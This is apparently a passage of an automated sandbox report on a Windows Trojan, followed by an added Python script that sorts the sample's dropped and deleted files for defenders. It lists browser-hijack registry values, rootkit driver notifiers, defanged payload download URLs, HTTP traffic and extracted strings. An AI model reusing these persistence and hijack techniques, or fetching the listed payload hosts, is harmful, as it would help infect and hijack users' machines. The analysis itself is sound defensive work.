C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\35BB6C6081B10CDF7DB50B6EFA374FE53E7BDFF8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\0VR58838.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozplugin-block-digest256.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\14926D90946B0F4BA2FCA38D75A5FBA83EF29AD0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\D3620E4C550741E4DDAEC4D0AB078C93B1727686 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\45B87FD3EF6A4D430DA29B1C188A4A5FAFC69C3C (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-malware-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\4F47793AB96483D552603451EF223EFE9EFAB646 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\doomed (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\CBA2520DD31049525B64F21BBF7476F4E2AC1945 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\59FYE1S2.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\_CACHE_CLEAN_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-block-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\53EACA4C6576AB60F419E74ED41F7A38AECF13D3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000005 (0 bytes)
C:\Windows\CLOG.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000007 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\A2F1ABCE909764E5E04E373F145C9C3886BAF96B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000002 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000003 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\97A235A1B13145568E910503A58B8E76054337B9 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-unwanted-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\startupCache\startupCache.4.little (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8FF14B3918ED9F95C48889D4B31C7D7F6E5F0764 (0 bytes)
C:\Windows\xEQSlj.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\03Z3OHNC.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\49BE32824E0BEC3A9A307F5D676B110AE86F1525 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\LXL295FY.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B7B9989DD0CA3B12797AAA0DED4830817A18AF46 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\index (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C3357B699A03D6C47624A0BC4184ED6E2B8D6443 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B5C4975322F4602AB10B7CA78508940BDD035CA4 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-trackwhite-digest256.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-block-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KCULDY7L.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\AE2CE72866097CB9D30937BE22EDFC3338CFF98D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0D043EB989F0FC6687A4FE1945189BE609121C27 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-track-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-track-digest256.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C7BC478C975246AA379BD2F61AE321CCCC3810B9 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\6FD573E2D36B9D3C24362667556816AF31DA3541 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\84695AE0389FC766A8E02D06319A5484EC0EA303 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KUZ61ORW.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-trackwhite-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\_CACHE_MAP_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\5D44AC703C53CC7EE6356F698FD1B03DA81FFE47 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\F8AC72083E334F70A553AE68455FBDF0E65C5221 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000004 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2E78209F2BD7068695BB80AAE0D3E5F19A372BCA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C489C169C7BEFDF8E1C92A8B42A536E07094BFB3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-forbid-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-phish-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\637008686606A1B97226747F72405A0455707B8C (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KK0IK9EV.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\19829C5A0B960EA3263403EFD05B9EB93E557CA3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\Z40SB5AS.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000a (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\4A0EC69D76B2B80C39B49E6A9B3E7D14DFBD935B (0 bytes)

The process %original file name%.exe:3884 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\inplMsoI.dll (13 bytes)
C:\ProgramData\prjNVt\86ae56633941c20e9a65a719b5a2208.exe (7930 bytes)

The Trojan deletes the following file(s):

C:\Windows\inplMsoI.dll (0 bytes)
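The two file lists above are most useful when cross-referenced. Several dropped components appear in both the "creates and/or writes" and the "deletes" lists (CDClient_EX.sys, DvMtvJIVG.dll, NLVhhEmUa.tmp, xEQSlj.dll, CLOG.txt and inplMsoI.dll), so they were staged and removed again during execution and will not be found by a disk scan afterwards, while iAFqcX.dll, hlog.txt and the ProgramData copy remain on disk. Everything else deleted is browser cache, cookie and Temporary Internet Files state. The following Python script is an added example and not part of the Lavasoft report; it parses lines in the report's own "path (N bytes)" layout and separates transient drops, persistent drops and wiped browser state. The sample lines are a subset constructed from the lists above.

```python
"""Triage the file activity of a sandbox report.

Cross-references the "creates and/or writes" list with the "deletes" list:
a path in both was staged and removed during the run (transient), a path
only in the first is still on disk afterwards (persistent), and deleted-only
paths under browser profiles are the cache/cookie state the sample wiped.
"""
import re
from dataclasses import dataclass, field

# Sample lines constructed from the report above (a representative subset).
WRITTEN = r'''
C:\Windows\System32\20ed6a\CDClient_EX.sys (125 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries (600 bytes)
C:\Windows\YbfHFk\iAFqcX.dll (15859 bytes)
C:\Windows\CLOG.txt (87 bytes)
C:\Windows\YbfHFk\NLVhhEmUa.tmp (12 bytes)
C:\Windows\YbfHFk\DvMtvJIVG.dll (279 bytes)
C:\Windows\xEQSlj.dll (11 bytes)
C:\Windows\hlog.txt (981 bytes)
C:\Windows\inplMsoI.dll (13 bytes)
C:\ProgramData\prjNVt\86ae56633941c20e9a65a719b5a2208.exe (7930 bytes)
'''
DELETED = r'''
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries (0 bytes)
C:\Windows\System32\20ed6a\CDClient_EX.sys (0 bytes)
C:\Windows\YbfHFk\DvMtvJIVG.dll (0 bytes)
C:\Windows\CLOG.txt (0 bytes)
C:\Windows\YbfHFk\NLVhhEmUa.tmp (0 bytes)
C:\Windows\xEQSlj.dll (0 bytes)
C:\Windows\inplMsoI.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\ETGRPT21.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_0 (0 bytes)
'''

# One report line: "<path> (<size> bytes)".
LINE_RE = re.compile(r"^(?P<path>.+?) \((?P<size>\d+) bytes\)$")

# Browser profile/cache/cookie locations: churn caused by the sample wiping
# browser state, not components the sample dropped.
BROWSER_PREFIXES = (
    r"\AppData\Local\Mozilla\Firefox",
    r"\AppData\Local\Google\Chrome",
    r"\AppData\Roaming\Microsoft\Windows\Cookies",
    r"\AppData\Local\Microsoft\Windows\Temporary Internet Files",
)


def parse_paths(block: str) -> dict[str, int]:
    """Map each path in a report list to the byte count the report gives it."""
    out: dict[str, int] = {}
    for line in block.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            out[m.group("path")] = int(m.group("size"))
    return out


def is_browser_state(path: str) -> bool:
    return any(p.lower() in path.lower() for p in BROWSER_PREFIXES)


@dataclass
class Triage:
    transient: set = field(default_factory=set)            # written, then deleted
    persistent: set = field(default_factory=set)           # written, still on disk
    wiped_browser_state: set = field(default_factory=set)  # deleted only, browser data


def triage(written_block: str, deleted_block: str) -> Triage:
    written = parse_paths(written_block)
    deleted = parse_paths(deleted_block)
    t = Triage()
    for path in written:
        if is_browser_state(path):
            continue  # profile churn, not a dropped component
        (t.transient if path in deleted else t.persistent).add(path)
    for path in deleted:
        if path not in written and is_browser_state(path):
            t.wiped_browser_state.add(path)
    return t


if __name__ == "__main__":
    result = triage(WRITTEN, DELETED)
    print("Still on disk after execution (hunt for these first):")
    for p in sorted(result.persistent):
        print("  ", p)
    print("Written then deleted (recoverable only from the sandbox or the MFT/USN journal):")
    for p in sorted(result.transient):
        print("  ", p)
    print(f"Browser state wiped: {len(result.wiped_browser_state)} entries")
```

Run against the full lists rather than the subset and the persistent set is what an on-host sweep should look for; the transient set is what a memory image or the USN journal has to supply.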

Registry activity

The process 86ae56633941c20e9a65a719b5a2208.exe:2388 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\86ae56633941c20e9a65a719b5a2208_RASAPI32]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\86ae56633941c20e9a65a719b5a2208_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\86ae56633941c20e9a65a719b5a2208_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\System\CurrentControlSet\services\VIqWRnjsVne]
"ErrorControl" = "1"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"URL" = "https://www.baidu.com/s?word={searchTerms}&tn=90117059_hao_pg&ie=utf-8"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\86ae56633941c20e9a65a719b5a2208_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"ShortcutBehavior" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{24C5EDBC-2851-452A-B521-5DA992F6C1B5}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"

[HKLM\System\CurrentControlSet\services\VIqWRnjsVne]
"Start" = "3"

[HKCU\Software\Classes\Local Settings\MuiCache\2F\52C64B7E]
"LanguageList" = "en-US, en"

[HKLM\SOFTWARE\Microsoft\Tracing\86ae56633941c20e9a65a719b5a2208_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\86ae56633941c20e9a65a719b5a2208_RASMANCS]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecision" = "3"

[HKLM\System\CurrentControlSet\services\VIqWRnjsVne]
"Type" = "1"
"Devname" = "VIqWRnjsVneT"

[HKLM\SOFTWARE\Microsoft\Tracing\86ae56633941c20e9a65a719b5a2208_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Enable Browser Extensions" = "no"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "3"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Local Page" = "https://www.hao123.com/?tn=90117059_hao_pg"

[HKLM\System\CurrentControlSet\services\VIqWRnjsVne]
"ImagePath" = "\DosDevices\C:\Windows\system32\20ed6a\CDClient_EX.sys"

[HKLM\SOFTWARE\Microsoft\Tracing\86ae56633941c20e9a65a719b5a2208_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\86ae56633941c20e9a65a719b5a2208_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 36 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"PopupsUseNewWindow" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadNetworkName" = "Network 2"

[HKLM\SOFTWARE\Microsoft\Tracing\86ae56633941c20e9a65a719b5a2208_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "https://www.hao123.com/?tn=90117059_hao_pg"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecisionTime" = "00 8D E7 CB 83 44 D2 01"

[HKLM\SOFTWARE\Microsoft\Tracing\86ae56633941c20e9a65a719b5a2208_RASAPI32]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 09 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\86ae56633941c20e9a65a719b5a2208_RASMANCS]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "00 8D E7 CB 83 44 D2 01"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Internet Explorer\TypedURLs]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

Dropped PE files

MD5 File path
346a9183e3bceb14f02a229f1e9c5349 c:\ProgramData\prjNVt\86ae56633941c20e9a65a719b5a2208.exe
346a9183e3bceb14f02a229f1e9c5349 c:\Users\All Users\prjNVt\86ae56633941c20e9a65a719b5a2208.exe
158b710a2ce07e3a34e46118f2ad39f2 c:\Windows\YbfHFk\DvMtvJIVG.dll
52ac959ebc7c2a2c8e29682b4ad39e15 c:\Windows\YbfHFk\iAFqcX.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "\DosDevices\C:\Windows\system32\20ed6a\If56Km8kP8g.sys", the Trojan controls the creation and closing of processes by installing a process notifier.
Using the driver "entry 1 from table of Process notifiers, error 59" the Trojan controls creation and closing of processes by installing the process notifier.
Using the driver "\DosDevices\C:\Windows\system32\20ed6a\If56Km8kP8g.sys", the Trojan controls the loading of executable images into memory by installing a load-image notifier.
Using the driver "\DosDevices\C:\Windows\system32\20ed6a\If56Km8kP8g.sys", the Trojan controls operations on the system registry by installing a registry notifier.

Propagation

VersionInfo

No information is available.

PE Sections

Name   Virtual Address  Virtual Size  Raw Size  Entropy  Section MD5
CODE   4096             1249280       1003520   5.54505  16917574c9651c104623cb79f6615541
.rsrc  1253376          12288         9728      4.43463  8f101314016c4a4799fd0caa4c86d69b

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://www.58sky.com/index/getcfg?id=8357 119.97.143.13
hxxp://5636.ecoma.ourwebpic.com/d2/CDClient.dll
hxxp://5636.ecoma.ourwebpic.com/d2/x86.dll
hxxp://5636.ecoma.ourwebpic.com/
hxxp://cdn.sp.cdntip.com/ic.asp
hxxp://175.haodns123.cc/
hxxp://1212.ip138.com/ic.asp 113.200.90.149
hxxp://www.go890.com/d2/CDClient.dll 87.245.198.83
hxxp://www.ip138.com/ 87.245.198.83
hxxp://www.175sf.com/ 183.60.200.84
hxxp://www.go890.com/d2/x86.dll 87.245.198.83


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET / HTTP/1.1
Host: VVV.ip138.com
Accept: text/html, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)


HTTP/1.1 200 OK
Date: Tue, 22 Nov 2016 03:48:29 GMT
Content-Length: 18658
Content-Type: text/html
Content-Location: hXXp://VVV.ip138.com/index.htm
Last-Modified: Tue, 01 Nov 2016 11:32:20 GMT
Accept-Ranges: bytes
ETag: "de335d9b3334d21:449e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 7082
X-Via: 1.1 db77:5 (Cdn Cache Server V2.0)
Connection: keep-alive

<<< skipped >>>

GET /d2/x86.dll HTTP/1.1
Host: VVV.go890.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Date: Tue, 22 Nov 2016 05:46:20 GMT
Server: kangle/2.9.6
Last-Modified: Wed, 21 Sep 2016 07:08:16 GMT
Content-Type: application/octet-stream
Content-Length: 132608
X-Via: 1.1 db78:1 (Cdn Cache Server V2.0)
Connection: keep-alive

<<< skipped >>>

GET / HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: VVV.175sf.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Tue, 22 Nov 2016 05:46:38 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Location: hXXp://VVV.175sf.com/index.html
Last-Modified: Tue, 22 Nov 2016 00:53:19 GMT
Content-Encoding: gzip

<<< skipped >>>

GET /d2/CDClient.dll HTTP/1.1
Host: VVV.go890.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Date: Tue, 22 Nov 2016 05:46:00 GMT
Server: kangle/2.9.6
Last-Modified: Tue, 22 Nov 2016 03:29:18 GMT
Content-Type: application/octet-stream
Content-Length: 868352
X-Via: 1.1 db78:1 (Cdn Cache Server V2.0)
Connection: keep-alive

<<< skipped >>>

GET /index/getcfg?id=8357 HTTP/1.1
Host: VVV.58sky.com
Accept: text/html, */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200
Server: nginx/1.4.4
Date: Tue, 22 Nov 2016 05:45:29 GMT
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Encoding: gzip

<<< skipped >>>

GET /ic.asp HTTP/1.1
Host: 1212.ip138.com
Accept: text/html, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)


HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Connection: keep-alive
Date: Tue, 22 Nov 2016 05:27:25 GMT
Content-Type: text/html
Content-Length: 219
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDQATCCDRD=PNFPNOOBJDOMLOLLBGFPFJNH; path=/
X-Daa-Tunnel: hop_count=1
<html>..<head>..<meta http-equiv="content-type" content
="text/html; charset=gb2312">..<title> ....IP.... </title&
gt;..</head>..<body style="margin:0px"><center>....I
P....[194.242.96.226] ............</center></body></htm
l>..


The Trojan connects to the servers at the following location(s):

86ae56633941c20e9a65a719b5a2208.exe_2388:

`.rsrc
kernel32.dll
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
u%CNu
%s[%d]
1.2.8
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WS2_32.DLL
127.0.0.1
TIdSocketListWindows
TIdStackWindowsU
IdStackWindows
%s, %.2d %s %.4d %s %s
%s, %d %s %d %s %s
TIdEncoder3to4.Encode: Calculated length exceeded (expected
%Program Files%\Borland\Delphi7\Source\Indy\Source\IdCoder3to4.pas
TIdEncoder3to4.Encode: Calculated length not met (expected
password
Password
IdHTTPHeaderInfo
ProxyPassword<
ProxyPort
Mozilla/3.0 (compatible; Indy Library)
ftpTransfer
ftpReady
ftpAborted
ClientPortMin<
ClientPortMax
PortX
EIdCanNotBindPortInRange
EIdInvalidPortRangeSVW
libeay32.dll
ssleay32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
X509_STORE_CTX_get_current_cert
des_set_key
saUsernamePassword
Password<
Port
0.0.0.1
TIdTCPConnection
IdTCPConnection
EIdTCPConnectionError
sslvrfFailIfNoPeerCert
TPasswordEvent
Certificate
RootCertFile
CertFile
KeyFile
OnGetPassword
EIdOSSLLoadingRootCertError
EIdOSSLLoadingCertError4.C
EIdOSSLLoadingKeyError
TIdTCPClient
TIdTCPClientPKC
IdTCPClient
BoundPort
PortU
CommentURL
TIdHTTPMethod
IdHTTP
TIdHTTPOption
TIdHTTPOptions
TIdHTTPProtocolVersion
TIdHTTPOnRedirectEvent
TIdHTTPResponse
TIdHTTPRequest
TIdHTTPRequestxuC
TIdHTTPProtocol
TIdCustomHTTP
TIdHTTPtxC
TIdHTTP
HTTPOptions
Port\hC
EIdHTTPProtocolException
application/x-www-form-urlencoded
HTTPS
https
This request method is supported in HTTP 1.1
HTTP/1.0 200 OK
HTTP/
%d.%d.%d.%d
;8=$:$:$;
b~~z0%%cz$ik~x$id%
00-00-00-00-00
SoftWare\Microsoft\Windows NT\CurrentVersion\NetworkCards
SoftWare\Microsoft\Windows NT\CurrentVersion\NetworkCards\
KERNEL32.DLL
NTDLL.DLL
TIdUDPBase
TIdUDPBaset7D
IdUDPBase
255.255.255.255
TIdUDPClient
IdUDPClient
Port<
Uh.BD
Ínor%xom
Ínor%o|od~
b~~z0%%}}}$?2yas$iegÍnor%mo~ilm5cn7
b~~z0%%id}r$?2kn$idÍnor%mo~ilm5cn7
8$:$;$;2
inflate 1.2.8 Copyright 1995-2013 Mark Adler
C:\Windows\CLOG.txt
2016-11-22
07:46:15
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
RegEnumKeyExA
GetWindowsDirectoryA
GetCPInfo
MsgWaitForMultipleObjects
URLMON.DLL
UrlMkGetSessionOption
shell32.dll
wsock32.dll
ADVAPI32.DLL
ntdll.dll
Rpcrt4.dll
KWindows
IdTCPStream
 IdTCPServer
0IdHTTPHeaderInfo
UrlMon
<requestedExecutionLevel level="requireAdministrator"/>
Error creating SSL context. Could not load root certificate.
Could not load certificate.#Could not load key, check password.
SSL status: "%s"
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
Command not supported.
Address type not supported.$Error accepting connection with SSL.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
Protocol not supported.
Socket type not supported."Operation not supported on socket.
Protocol family not supported.0Address family not supported by protocol family.
Chunk StartedDThis authentication method is already registered with class name %s.
%s is not a valid service.
Socket Error # %d
%s is not a valid IP address.
Operation would block.
File "%s" not found1Only one TIdAntiFreeze can exist per application.
No data to read.$Can not bind in port range (%d - %d)
Invalid Port Range (%d - %d)
Max line length exceeded.*Error on call Winsock2 library function %s&Error on loading Winsock2 library (%s)
Resolving hostname %s.
